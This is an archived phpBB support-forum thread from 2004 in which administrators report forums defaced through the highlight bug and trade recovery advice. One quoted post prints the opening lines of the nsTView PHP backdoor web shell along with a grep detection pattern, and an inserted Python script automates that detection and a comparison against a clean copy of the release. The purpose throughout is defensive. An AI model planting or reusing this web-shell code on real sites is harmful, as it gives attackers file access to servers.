Forum Hacked by someone

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
deef
Registered User
Posts: 10
Joined: Fri May 23, 2003 1:26 pm
Location: Belgium

Post by deef »

mp24 wrote: @ Techie-Micheal:

Until this morning. Someone exploited the highlight bug, although we had fixed it to what it says here: http://www.phpbb.com/security/final_reports.php?p=1 .


Same problem. I had a working version 2.0.11 and got hacked today.... I let my provider set my site back (provider is combell.com).

I read about this bug... and in version 2.0.11 I also got this bug....

I hope it is solved now.... otherwise I do not know what I must do...
I have read 10 pages of this topic today.... I'm tired of reading.... checked all my files and directories... checked my whole configuration but I cannot find anything weird....

The only thing I do not know where to find is the log...

(but my site is working for now... but for how long ?)

deef
Registered User
Posts: 10
Joined: Fri May 23, 2003 1:26 pm
Location: Belgium

Re: Ferror Crew, YOU GOT ME.... great job

Post by deef »

Techie-Micheal wrote:
deef wrote: Or must I ask at the "Ferror Crew" for a solution ? :oops: :?:
That was not called for...


Sorry, I meant not to be rude, it was only a joke... At the beginning of the hacking history (today for me) I found it pleasant....

But now I have pain in my ass, eyes and neck from reading this topic.... now I'm angry... I don't understand those people...

I want to apologize....

seifenkiste
Registered User
Posts: 48
Joined: Sat Nov 09, 2002 9:21 pm
Location: Italy

Post by seifenkiste »

my forum has been working 12 hours without hacking today, let's see for how long.

Moderators: what about making a short topic with the most important suggestions (taken from this topic) on how not to get hacked? And maybe sending a mass email to all your users if something this big is getting public? I know 100,000 users are a lot, but they are also the main strength of phpBB. Not everybody has the time to check this forum every day, except hackers.

Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

seifenkiste wrote: my forum has been working 12 hours without hacking today, let's see for how long.

Moderators: what about making a short topic with the most important suggestions (taken from this topic) on how not to get hacked? And maybe sending a mass email to all your users if something this big is getting public? I know 100,000 users are a lot, but they are also the main strength of phpBB. Not everybody has the time to check this forum every day, except hackers.
I've been considering a sticky to summarize the points, what to do, etc. As for mass mailing, there is discussion going on about a mailing list.
Proven Offensive Security Expertise. OSCP - GXPN

deef
Registered User
Posts: 10
Joined: Fri May 23, 2003 1:26 pm
Location: Belgium

Post by deef »

Techie-Micheal wrote: I've been considering a sticky to summarize the points, what to do, etc. As for mass mailing, there is discussion going on about a mailing list.


This is good... I'm a member of a lot of boards that send weekly mass mails... this is not good because members do not read them anymore...

I vote for NOT sending mass mails.... However, on this topic the techie team (or moderators) MUST take their responsibility and send a mass mail (use a different layout than the normal mass mails, which we don't read because we think they are junk mail)
and give a link to the new summary topic...

idav
Registered User
Posts: 4
Joined: Thu Dec 09, 2004 1:38 pm
Location: Kingsport, Tennessee

HACKED- FORUM OWNED BY XXSCXX- Help!

Post by idav »

Wow. What a way to start the day trying to chase down a hack!

We run a popular musician forum in Northeast Tennessee that has 900 users. We had well over 30,000 threads and have been stable since 2002.

Last night, a hacker came in and eliminated all of our threads...
A message was also sent out to our users that stated...
GOTRICITIES HAS BEEN OWNED!!

YOUR FORUM HAS BEEN OWNED BY XxScxX

I'm in dire need of some suggestions. We're trying to restore from a backup, but I sure would appreciate any insight into this problem, how it happened and what we can do to prevent this.

Any time would be greatly appreciated!

David
Last edited by idav on Fri Dec 10, 2004 1:43 am, edited 1 time in total.

Dark
Registered User
Posts: 190
Joined: Sat Jan 12, 2002 9:44 pm
Location: Alberta, Canada

Post by Dark »

Upgrade to 2.0.11 and as to restoring it, i suggest if there are no mods just reupload everything and restore the SQL from a backup.

Alberrisford
Registered User
Posts: 37
Joined: Sun Aug 25, 2002 6:25 pm

Post by Alberrisford »

My forums were hacked yesterday :( . I didn't know about the fix; luckily no damage seems to have been done. Just the main index page and the /forums index page were changed, nothing else seems to be affected. I am just in the process of upgrading to 2.0.11.

Does anyone know of anything else I can do to make sure everything else is ok and it won't happen again? The server it's hosted on is not mine, it's operated by 1&1 (...dont get me started!). Someone mentioned that they could have created a backdoor for themselves to get in next time, is this possible?

Thanks a lot

seifenkiste
Registered User
Posts: 48
Joined: Sat Nov 09, 2002 9:21 pm
Location: Italy

Post by seifenkiste »

Alberrisford wrote: Someone mentioned that they could have created a backdoor for themselves to get in next time, is this possible?

Thanks a lot


yes, it is possible. See the post on page 10 in this thread where it is explained which words you should look for to find the backdoor file.

seifenkiste
Registered User
Posts: 48
Joined: Sat Nov 09, 2002 9:21 pm
Location: Italy

Post by seifenkiste »

I mean this one:

The Bad Astronomer wrote: OK then, that's gotta be it, at least in some cases.

If your board is under this attack, then you must look for that file. What's going on is that the hacker is using it to change files on your site.

The file can be named anything. In my case, it was newsletter.php, which was pretty evil, because I have several newsletter files [edited to add: I didn't even find the file: my webhost, BlueVirtual, found it when I enlisted their help]. I also found an identical file named functions_topic.php. I downloaded (but didn't install) the entire phpBB 2.0.11 file structure to check, and saw no files named newsletter.php or functions_topic.php, so I knew I had it.

You can find the files if you have direct access to them via a shell. Once I found one of the files, I searched in it for a line that was unique enough to distinguish it from other files. By searching all my files for that line, I was able to find the second copy.

If you have shell access to your files, then go to your top html directory (not just your top phpBB directory!), and type this:
grep -R eregi * | grep unix


This will search through all your directories, going through the files and looking for the word "eregi"; then, when it finds it, it looks for the word "unix" (since "eregi" appears in legitimate files, looking for "unix" nails it).

Any file you find doing this is likely to be the backdoor file. If you find any files, then look at the first few lines. Here is what the evil file's first lines look like:
<?
@set_time_limit(0);
if($_GET[download]){
header("Content-disposition: attachment; filename=\"$download\";");
readfile("$d/$download");
exit;}
$images=array(".gif",".jpg",".png",".bmp");
$whereme=getcwd();
$d=$_GET[d];
#############
$ver= "v1.1";
#############
$copyr = "<center><a href=http://nst.e-nex.com target=_blank>nsTView $ver<br>o... Network security team ...o</a>";
$php_self=$_SERVER[PHP_SELF];
if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}


If you see this, then delete the file! It's allowing the hacker access to your files. If you feel uncomfortable deleting it, then send it to Graham or one of the other admins for confirmation.

If you don't have shell access to your files, then maybe you can gzip them up, transfer them to your home computer and look at them there. Use the "search" function to look through them for those words.

Note: just upgrading to 2.0.11 will not solve your problem if you still have copies of this file on your system!

I cleaned off my files yesterday, and have not had any problems since. I upgraded to 2.0.11 and changed my passwords, just to be safe. I suggest you do too.

Finally, I'll note that this may not be everyone's problem, but it was certainly mine, and it looks like EternalOne's as well. So maybe this will help some folks.

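The two checks the quoted post does by hand, as an added example that is not part of the original thread or of phpBB itself: a line-level equivalent of `grep -R eregi * | grep unix` run from the top HTML directory, and a comparison of the live board against a pristine unpacked copy of the same release. The sample trees it builds (file names, contents and the abbreviated backdoor) are constructed for the demo and are not real phpBB 2.0.11 files; the only thing taken from the post is the one-line signature `if(@eregi("/",$whereme)){$os="unix";}...`.

```python
import hashlib
import tempfile
from pathlib import Path

# Both strings occur on one line of the nsTView backdoor quoted above:
#   if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
# Legitimate phpBB 2.0.x files call eregi() too, so the second string is
# what narrows the match, exactly as in `grep -R eregi * | grep unix`.
FIRST, SECOND = b"eregi", b"unix"


def grep_pipeline(webroot):
    """Line-level equivalent of `grep -R eregi * | grep unix` run from the
    top HTML directory: every line containing both strings, reported as
    (relative path, 1-based line number, stripped line)."""
    root = Path(webroot)
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        for n, line in enumerate(path.read_bytes().splitlines(), 1):
            if FIRST in line and SECOND in line:
                hits.append((str(path.relative_to(root)), n,
                             line.decode("latin-1").strip()))
    return hits


def _digests(root):
    root = Path(root)
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}


def compare_with_clean_tree(webroot, clean_root):
    """The post's second check made mechanical: unpack a pristine tarball of
    the same phpBB release beside the live board and diff the file lists.
    'added' catches a dropped file under any name, grep signature or not;
    'modified' catches a legitimate file the shell was used to edit;
    'missing' is simply deleted files."""
    live, clean = _digests(webroot), _digests(clean_root)
    return {
        "added": sorted(set(live) - set(clean)),
        "modified": sorted(f for f in set(live) & set(clean) if live[f] != clean[f]),
        "missing": sorted(set(clean) - set(live)),
    }


# Constructed sample files (assumption: not real phpBB sources): two
# legitimate files, one of which uses eregi() without "unix", and an
# abbreviated backdoor dropped under the innocent name newsletter.php.
LEGIT_FUNCTIONS = b'<?php\nif (eregi("^[a-z]+$", $name)) { return true; }\n'
LEGIT_DB = b'<?php\n$db = new sql_db($dbhost, $dbuser, $dbpasswd, $dbname);\n'
BACKDOOR = (b'<?\n@set_time_limit(0);\n$whereme=getcwd();\n'
            b'if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}\n')


def _write(root, rel, data):
    p = Path(root) / rel
    p.parent.mkdir(parents=True, exist_ok=True)
    p.write_bytes(data)


def demo():
    """Build the sample trees in a temp dir and run both checks."""
    with tempfile.TemporaryDirectory() as tmp:
        live, clean = Path(tmp) / "html", Path(tmp) / "phpBB2-clean"
        for root in (live, clean):
            _write(root, "phpBB2/includes/functions.php", LEGIT_FUNCTIONS)
            _write(root, "phpBB2/db/mysql.php", LEGIT_DB)
        _write(live, "phpBB2/db/mysql.php", LEGIT_DB + b"// tampered\n")
        _write(live, "newsletter.php", BACKDOOR)  # outside the phpBB directory
        _write(live, "phpBB2/includes/functions_topic.php", BACKDOOR)
        return {"grep": grep_pipeline(live),
                "diff": compare_with_clean_tree(live / "phpBB2", clean / "phpBB2")}


if __name__ == "__main__":
    result = demo()
    for hit in result["grep"]:
        print("%s:%d: %s" % hit)
    print(result["diff"])
```

The two checks cover different gaps. The grep only finds this particular, unobfuscated shell, but it runs over the whole web root, so it catches the copy dropped outside the phpBB directory. The tree comparison catches a dropped file under any name and any encoding, and an edited legitimate file, but only within the directory you diffed, and it needs a clean copy of exactly the release you run. Doing both, then upgrading and changing passwords as the post says, is the practical minimum.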
Dark Side
Registered User
Posts: 21
Joined: Sun Jun 13, 2004 1:08 am
Location: Southeast, U.S.

Weird "DEBUG' Error now

Post by Dark Side »

I did the upgrade to my club's forums earlier (no evidence of hacking) and have now started seeing this strange message sometimes when navigating the pages of the forum. Not all the time, mind you....just intermittently. Any clues?
Warning: odbc_exec(): SQL error: [Microsoft][ODBC Microsoft Access Driver] The search key was not found in any record., SQL state S1000 in SQLExecDirect in d:\html\users\caos4x4com\html\boards\db\msaccess.php on line 176
phpBB : Critical Error

Error clearing sessions table

DEBUG MODE

SQL Error : Error

DELETE FROM phpbb_sessions WHERE session_time < 1102626068 AND session_id <> '809d0e17f676a2152de986b56e5cf449'

Line : 302
File : d:\html\users\caos4x4com\html\boards\includes\sessions.php


We were wanting to convert the access database to MySQL because our membership is growing faster than expected but, not until this error message is resolved first. No sense in converting one problem into another. Still have to find a way to convert it too. :?:

I apologize if this is in the wrong forum but considering it had to do with the upgrade...I tried here first.
Dark Side

JoelSherrill
Registered User
Posts: 7
Joined: Thu Dec 09, 2004 9:50 pm

Yet Another Site Hacked

Post by JoelSherrill »

I know I am not alone in reporting this but wanted to share my pain with someone. elviscostellofans.com was running 2.0.10 and got thoroughly hacked on Nov 27. They installed phpshell and changed all passwords. I assume they destroyed the database. We were hosted by hostmatix.com and their support has been as pitiful as the others reported. I now have 5 inquiries in to reset the password and check on the DB and last backup. They have never responded. I got one comment that their backup would be 30 days old. For that, we paid a hosting company.

That has driven me to get a static IP from my cable provider and rehost the site on a Linux machine in my house. At least I can touch it myself and keep better backups. We ended up restoring from a September backup and are up temporarily at http://ecfans.dyndns.org/phpBB2

We are now running 2.0.11 which was installed from the tar ball with a few local mods. Some have reported that there is still a possible hole in 2.0.11. Is there really or is it a side-effect of an incomplete update?

Enough whining. I really hope to contribute some in the near future. I like this package. :)

--joel sherrill

idav
Registered User
Posts: 4
Joined: Thu Dec 09, 2004 1:38 pm
Location: Kingsport, Tennessee

OWNED! BY XxSCxX :: Official Sites

Post by idav »

This detail is related to our search for the individuals that hacked our site.

Whomever attacked ours sent a mass mail to all 900 users that stated our web site GOTRICITIES.COM HAS BEEN OWNED!!!

The email and signature on the forum threads stated...

YOUR FORUM HAS BEEN OWNED BY XxScxX

Looking this up on Google
http://www.google.com/search?q=XxScxX&ie=UTF-8&oe=UTF-8

brings back..
http://forums.inscriber.com/Register.php

Not sure if this is related. Could be just a trophy list. I have contacted the support threads at inscriber.com to see if they can help.

idav

JoelSherrill
Registered User
Posts: 7
Joined: Thu Dec 09, 2004 9:50 pm

Post by JoelSherrill »

We didn't get a mass mailing but only a partially uploaded and renamed copy of phpshell. The defamed index.php produced a page with EGY_HACKMAN@YAHOO.COM and some incorrectly spelled anti-semitic ranting.

SimonEast
Registered User
Posts: 9
Joined: Thu Aug 05, 2004 8:50 am

Post by SimonEast »

Removed by moderator, per user request - Techie-Micheal
